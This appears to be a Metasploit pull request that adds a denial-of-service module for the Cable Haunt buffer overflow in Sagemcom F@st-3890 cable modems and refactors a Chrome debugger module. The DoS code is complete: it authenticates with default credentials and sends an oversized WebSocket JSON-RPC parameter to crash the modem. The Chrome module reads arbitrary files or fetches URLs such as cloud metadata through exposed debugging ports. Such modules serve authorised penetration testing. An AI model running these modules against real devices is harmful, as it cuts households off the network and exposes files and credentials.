### PR TITLE
Adding Cable Haunt WebSocket DoS Module

### DIFF
--- a/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md
+++ b/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md
@@ -1,0 +1,39 @@
+# Vulnerable Application
+Sagecom F@st-3890 Cable Modems
+
+# Options
+
+## WS_USERNAME
+This is the basic auth username for the spectrum analysis web service.  This is typicall default credentials such as `admin:password` but may also be something along the lines of `spectrum:spectrum`.  This will vary from manufacturer to manufacturer and ISP to ISP.
+
+## WS_PASSWORD
+This is the basic auth password for the spectrum analysis web service.
+
+## TIMEOUT
+This is the timeout in seconds that the module should wait before making a conclusion on the success of the payload delivery.  Typically, the device crashes within about 5 second of the payload being delivered.  The default value of `15` should be seen as the lower bound for `TIMEOUT` values.
+
+## RHOSTS
+Typically the only address which should be used for this value is `192.168.100.1`. It can be different, but not in a well-secured configuration.
+
+## RPORT
+On some devices the Spectrum Analysis web service runs on port `8080`, though Lyrebirds (the original discoverer and PoC author) notes that sometimes it can run on port `6080`.
+
+# Scenarios
+
+```
+msf5 auxiliary(dos/http/cable_haunt_websocket_dos) > run
+[*] Running module against 192.168.100.1
+
+[*] Attempting Connection to 192.168.100.1
+[*] Opened connection
+[*] Sending payload
+[*] Checking Modem Status
+[*] Cable Modem unreachable
+[+] Exploit delivered and cable modem unreachable.
+[*] Auxiliary module execution completed
+```
+
+# Notes
+Please note that successful completion of this module will most likely knock out upstream network services, including any remote sessions connected through the cable modem.
+
+Please refer to [https://cablehaunt.com/](https://cablehaunt.com/) for more information on this vulnerability.

--- a/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md
+++ b/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md
@@ -1,24 +1,34 @@
-# Vulnerable Application
+## Vulnerable Application
+
 Sagecom F@st-3890 Cable Modems
 
-# Options
+Please note that successful completion of this module will most likely knock out upstream network services, including any remote sessions connected through the cable modem.
 
-## WS_USERNAME
+Please refer to [https://cablehaunt.com/](https://cablehaunt.com/) for more information on this vulnerability.
+
+## Options
+
+**WS_USERNAME**
+
 This is the basic auth username for the spectrum analysis web service.  This is typicall default credentials such as `admin:password` but may also be something along the lines of `spectrum:spectrum`.  This will vary from manufacturer to manufacturer and ISP to ISP.
 
-## WS_PASSWORD
+**WS_PASSWORD**
+
 This is the basic auth password for the spectrum analysis web service.
 
-## TIMEOUT
+**TIMEOUT**
+
 This is the timeout in seconds that the module should wait before making a conclusion on the success of the payload delivery.  Typically, the device crashes within about 5 second of the payload being delivered.  The default value of `15` should be seen as the lower bound for `TIMEOUT` values.
 
-## RHOSTS
+**RHOSTS**
+
 Typically the only address which should be used for this value is `192.168.100.1`. It can be different, but not in a well-secured configuration.
 
-## RPORT
+**RPORT**
+
 On some devices the Spectrum Analysis web service runs on port `8080`, though Lyrebirds (the original discoverer and PoC author) notes that sometimes it can run on port `6080`.
 
-# Scenarios
+## Scenarios
 
 ```
 msf5 auxiliary(dos/http/cable_haunt_websocket_dos) > run
@@ -32,8 +42,3 @@ msf5 auxiliary(dos/http/cable_haunt_websocket_dos) > run
 [+] Exploit delivered and cable modem unreachable.
 [*] Auxiliary module execution completed
 ```
-
-# Notes
-Please note that successful completion of this module will most likely knock out upstream network services, including any remote sessions connected through the cable modem.
-
-Please refer to [https://cablehaunt.com/](https://cablehaunt.com/) for more information on this vulnerability.

--- a/documentation/modules/auxiliary/gather/chrome_debugger.md
+++ b/documentation/modules/auxiliary/gather/chrome_debugger.md
@@ -1,9 +1,9 @@
-# Chrome Debugger Arbitary File Read / Abitrary Web Request Auxiliary Module
+## Vulnerable Application
 
 This module takes advantage of misconfigured headless chrome sessions and either retrieves a specified file off the remote file system, or makes a web request from the remote machine.
 
-## Headless Chrome Sessions
-	
+This can be useful for retrieving cloud metadata in certain scenarios.  Primarily this module targets developers.
+
 A vulnerable Headless Chrome session can be started with the following command:
 
 ```
@@ -13,7 +13,7 @@ $ google-chrome --remote-debugging-port=9222 --headless --remote-debugging-addre
 This will start a webserver running on port 9222 for all network interfaces.
 
 ## Verification Steps
-	
+
 1. Start `msfconsole`
 2. Execute `auxiliary/gather/chrome_debugger`
 3. Execute `set RHOST $REMOTE_ADDRESS`
@@ -23,12 +23,17 @@ This will start a webserver running on port 9222 for all network interfaces.
 
 ## Options
 
-* FILEPATH - The file path on the remote you wish to retrieve
-* URL - A URL you wish to fetch the contents of from the remote machine
+**FILEPATH**
+
+The file path on the remote you wish to retrieve.
+
+**URL**
+
+A URL you wish to fetch the contents of from the remote machine.
 
 **Note:** One or the other must be set!
 
-## Example Run
+## Scenarios
 
 ```
 [*] Attempting Connection to ws://192.168.20.168:9222/devtools/page/CF551031373306B35F961C6C0968DAEC
@@ -40,7 +45,3 @@ This will start a webserver running on port 9222 for all network interfaces.
 [+] Retrieved resource
 [*] Auxiliary module execution completed
 ```
-
-## Notes
-
-This can be useful for retrieving cloud metadata in certain scenarios.  Primarily this module targets developers.

--- a/modules/auxiliary/dos/http/cable_haunt_websocket_dos.rb
+++ b/modules/auxiliary/dos/http/cable_haunt_websocket_dos.rb
@@ -31,6 +31,7 @@ class MetasploitModule < Msf::Auxiliary
       'DefaultTarget' => 0,
       'References'    =>
         [
+          ['EDB', '47936'],
           ['CVE', '2019-19494'],
           ['URL', 'https://cablehaunt.com/'],
           ['URL', 'https://github.com/Lyrebirds/sagemcom-fast-3890-exploit']

--- a/modules/auxiliary/dos/http/cable_haunt_websocket_dos.rb
+++ b/modules/auxiliary/dos/http/cable_haunt_websocket_dos.rb
@@ -41,8 +41,8 @@ class MetasploitModule < Msf::Auxiliary
       [
         Opt::RHOST('192.168.100.1'),
         Opt::RPORT(8080),
-        OptString.new('WS_USERNAME', [ true, 'File to fetch from remote machine.', 'admin']),
-        OptString.new('WS_PASSWORD', [ true, 'Url to fetch from remote machine.', 'password']),
+        OptString.new('WS_USERNAME', [ true, 'WebSocket connection basic auth username', 'admin']),
+        OptString.new('WS_PASSWORD', [ true, 'WebSocket connection basic auth password', 'password']),
         OptInt.new('TIMEOUT', [ true, 'Time to wait for response', 15])
       ]
     )

--- a/modules/auxiliary/dos/http/cable_haunt_websocket_dos.rb
+++ b/modules/auxiliary/dos/http/cable_haunt_websocket_dos.rb
@@ -1,0 +1,126 @@
+class MetasploitModule < Msf::Auxiliary
+  require 'eventmachine'
+  require 'faye/websocket'
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => '"Cablehaunt" Cable Modem WebSocket DoS',
+      'Description' => %q{
+        There exists a buffer overflow vulnerability in certain
+        Cable Modem Spectrum Analyzer interfaces.  This overflow
+        is exploitable, but since an exploit would differ between
+        every make, model, and firmware version (which also
+        differs from ISP to ISP), this module simply causes a
+        Denial of Service to test if the vulnerability is present.'
+      },
+      'License' => MSF_LICENSE,
+      'Author' => [
+        'Alexander Dalsgaard Krog (Lyrebirds)', # Original research, discovery, and PoC
+        'Jens Hegner Stærmose (Lyrebirds)', # Original research, discovery, and PoC
+        'Kasper Kohsel Terndrup (Lyrebirds)', # Original research, discovery, and PoC
+        'Simon Vandel Sillesen (Independent)', # Original research, discovery, and PoC
+        'Nicholas Starke' # msf module
+      ],
+      'Privileged' => false,
+      'Targets' => [
+      ],
+      'DisclosureDate' => 'Jan 07 2020',
+      'DefaultOptions' => {
+      },
+      'DefaultTarget' => 0,
+      'References'    =>
+        [
+          ['CVE', '2019-19494'],
+          ['URL', 'https://cablehaunt.com/'],
+          ['URL', 'https://github.com/Lyrebirds/sagemcom-fast-3890-exploit']
+        ]
+    ))
+
+    register_options(
+      [
+        Opt::RHOST('192.168.100.1'),
+        Opt::RPORT(8080),
+        OptString.new('WS_USERNAME', [ true, 'File to fetch from remote machine.', 'admin']),
+        OptString.new('WS_PASSWORD', [ true, 'Url to fetch from remote machine.', 'password']),
+        OptInt.new('TIMEOUT', [ true, 'Time to wait for response', 15])
+      ]
+    )
+
+    deregister_options('Proxies')
+    deregister_options('VHOST')
+    deregister_options('SSL')
+  end
+
+  def run
+    res = send_request_cgi({
+      'authorization' => basic_auth(datastore['WS_USERNAME'], datastore['WS_PASSWORD']),
+      'uri' => '/',
+      'method' => 'GET',
+    })
+
+    fail_with(Failure::Unreachable, 'Cannot Connect to Cable Modem Spectrum Analyzer Web Service') if res.nil?
+    fail_with(Failure::Unknown, 'Credentials were incorrect') if res.code != 200
+
+    @succeeded = false
+    EM.run {
+      print_status("Attempting Connection to #{datastore['RHOST']}")
+
+      driver = Faye::WebSocket::Client.new("ws://#{datastore['RHOST']}:#{datastore['RPORT']}/Frontend", ['rpc-frontend'])
+
+      driver.on :open do |event|
+        print_status('Opened connection')
+
+        EM::Timer.new(1) do
+          begin
+            print_status('Sending payload')
+            payload = Rex::Text.rand_text_alphanumeric(7000..8000)
+            driver.send({
+              'jsonrpc': '2.0',
+              'method': 'Frontend::GetFrontendSpectrumData',
+              'params': {
+                'coreID': 0,
+                'fStartHz': payload,
+                'fStopHz': 1000000000,
+                'fftSize': 1024,
+                'gain': 1
+              },
+              'id': '0'
+            }.to_json)
+          rescue
+            fail_with(Failure::Unreachable, 'Could not establish websocket connection')
+          end
+        end
+      end
+
+      EM::Timer.new(10) do
+        print_status('Checking Modem Status')
+        begin
+          res = send_request_cgi({
+            'uri' => '/',
+            'method' => 'GET',
+          })
+
+          if res.nil?
+            @succeeded = true
+            print_status('Cable Modem unreachable')
+          else
+            fail_with(Failure::Unknown, 'Host still reachable')
+          end
+        rescue
+          @succeeded = true
+          print_status('Cable Modem unreachable')
+        end
+      end
+
+      EM::Timer.new(datastore['TIMEOUT']) do
+        EventMachine.stop
+        if @succeeded
+          print_good('Exploit delivered and cable modem unreachable.')
+        else
+          fail_with(Failure::Unknown, 'Unknown failure occurred')
+        end
+      end
+    }
+  end
+end

--- a/modules/auxiliary/gather/chrome_debugger.rb
+++ b/modules/auxiliary/gather/chrome_debugger.rb
@@ -1,6 +1,12 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'eventmachine'
+require 'faye/websocket'
+
 class MetasploitModule < Msf::Auxiliary
-  require 'eventmachine'
-  require 'faye/websocket'
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -11,27 +17,20 @@ class MetasploitModule < Msf::Auxiliary
         files off the remote file system, or to make web requests
         from a remote machine.  Useful for cloud metadata endpoints!
       },
-      'License' => MSF_LICENSE,
       'Author' => [
         'Adam Baldwin (Evilpacket)', # Original ideas, research, proof of concept, and msf module
         'Nicholas Starke (The King Pig Demon)' # msf module
       ],
-      'Privileged' => false,
-      'Targets' => [
-      ],
       'DisclosureDate' => 'Sep 24 2019',
-      'DefaultOptions' => {
-      },
-      'DefaultTarget' => 0
+      'License' => MSF_LICENSE
     ))
 
     register_options(
       [
-        Opt::RHOST,
         Opt::RPORT(9222),
-        OptString.new('FILEPATH', [ false, 'File to fetch from remote machine.']),
-        OptString.new('URL', [ false, 'Url to fetch from remote machine.']),
-        OptInt.new('TIMEOUT', [ true, 'Time to wait for response', 10])
+        OptString.new('FILEPATH', [false, 'File to fetch from remote machine.']),
+        OptString.new('URL', [false, 'Url to fetch from remote machine.']),
+        OptInt.new('TIMEOUT', [true, 'Time to wait for response', 10])
       ]
     )
 
@@ -41,86 +40,85 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-
     if (datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty?) && (datastore['URL'].nil? || datastore['URL'].empty?)
       print_error('Must set FilePath or Url')
       return
     end
 
     res = send_request_cgi({
-        'uri' => '/json',
-        'method' => 'GET',
+      'method' => 'GET',
+      'uri' => '/json'
     })
 
     if res.nil?
       print_error('Bad Response')
-    else
-      data = JSON.parse(res.body).pop
-      EM.run {
-        file_path = datastore['FILEPATH']
-        url = datastore['URL']
+      return
+    end
 
-        if file_path
-          fetch_uri = "file://#{file_path}"
-        else
-          fetch_uri = url
+    data = JSON.parse(res.body).pop
+    EM.run do
+      file_path = datastore['FILEPATH']
+      url = datastore['URL']
+
+      if file_path
+        fetch_uri = "file://#{file_path}"
+      else
+        fetch_uri = url
+      end
+
+      print_status("Attempting Connection to #{data['webSocketDebuggerUrl']}")
+
+      unless data.key?('webSocketDebuggerUrl')
+        fail_with(Failure::Unknown, 'Invalid JSON')
+      end
+
+      driver = Faye::WebSocket::Client.new(data['webSocketDebuggerUrl'])
+
+      driver.on :open do
+        print_status('Opened connection')
+        id = rand(1024 * 1024 * 1024)
+
+        @succeeded = false
+
+        EM::Timer.new(1) do
+          print_status("Attempting to load url #{fetch_uri}")
+          driver.send({
+            'id' => id,
+            'method' => 'Page.navigate',
+            'params' => {
+              'url':  fetch_uri
+            }
+          }.to_json)
         end
 
-        print_status("Attempting Connection to #{data['webSocketDebuggerUrl']}")
-
-        if not data.key?('webSocketDebuggerUrl')
-          fail_with(Failure::Unknown, "Invalid JSON")
+        EM::Timer.new(3) do
+          print_status('Sending request for data')
+          driver.send({
+            'id' => id + 1,
+            'method' => 'Runtime.evaluate',
+            'params' => {
+              'expression' => 'document.documentElement.outerHTML'
+            }
+          }.to_json)
         end
+      end
 
-        driver = Faye::WebSocket::Client.new(data['webSocketDebuggerUrl'])
+      driver.on :message do |event|
+        print_status('Received Data')
 
-        driver.on :open do |event|
-          print_status('Opened connection')
-          id = rand(1024 * 1024 * 1024)
+        data = JSON.parse(event.data)
 
-          @succeeded = false
-
-          EM::Timer.new(1) do
-            print_status("Attempting to load url #{fetch_uri}")
-            driver.send({
-              'id' => id,
-              'method' => 'Page.navigate',
-              'params' => {
-                'url':  fetch_uri,
-              }
-            }.to_json)
-          end
-
-          EM::Timer.new(3) do
-            print_status('Sending request for data')
-            driver.send({
-              'id' => id + 1,
-              'method' => 'Runtime.evaluate',
-              'params' => {
-                'expression' => 'document.documentElement.outerHTML'
-              }
-            }.to_json)
-          end
+        if data['result']['result']
+          loot_path = store_loot('chrome.debugger.resource', 'text/plain', rhost, data['result']['result']['value'], fetch_uri, 'Resource Gathered via Chrome Debugger')
+          print_good("Stored #{fetch_uri} at #{loot_path}")
+          @succeeded = true
         end
+      end
 
-        driver.on :message do |event|
-          print_status("Received Data")
-
-          data = JSON.parse(event.data)
-
-          if data['result']['result']
-            loot_path = store_loot('chrome.debugger.resource', 'text/plain', rhost, data['result']['result']['value'], fetch_uri, 'Resource Gathered via Chrome Debugger')
-            print_good("Stored #{fetch_uri} at #{loot_path}")
-            @succeeded = true
-          end
-        end
-
-        EM::Timer.new(datastore['TIMEOUT']) do
-          EventMachine.stop
-          fail_with(Failure::Unknown, 'Unknown failure occurred') if not @succeeded
-        end
-      }
+      EM::Timer.new(datastore['TIMEOUT']) do
+        EventMachine.stop
+        fail_with(Failure::Unknown, 'Unknown failure occurred') unless @succeeded
+      end
     end
   end
 end
-


### PR DESCRIPTION
This module exploits a vulnerability in Sagecom
Cable Modems from a variety of manufacturers. Since
the firmware for vulnerable modems will vary based
on Make, Model, and ISP, this module can only be
used to verify the presence of the vulnerability,
and not actually return a shell. Successful
exploitation will most likely disrupt all upstream
services. Module documentation is included in this
commit.

Please refer to module documentation for further information.  

Addresses #12817 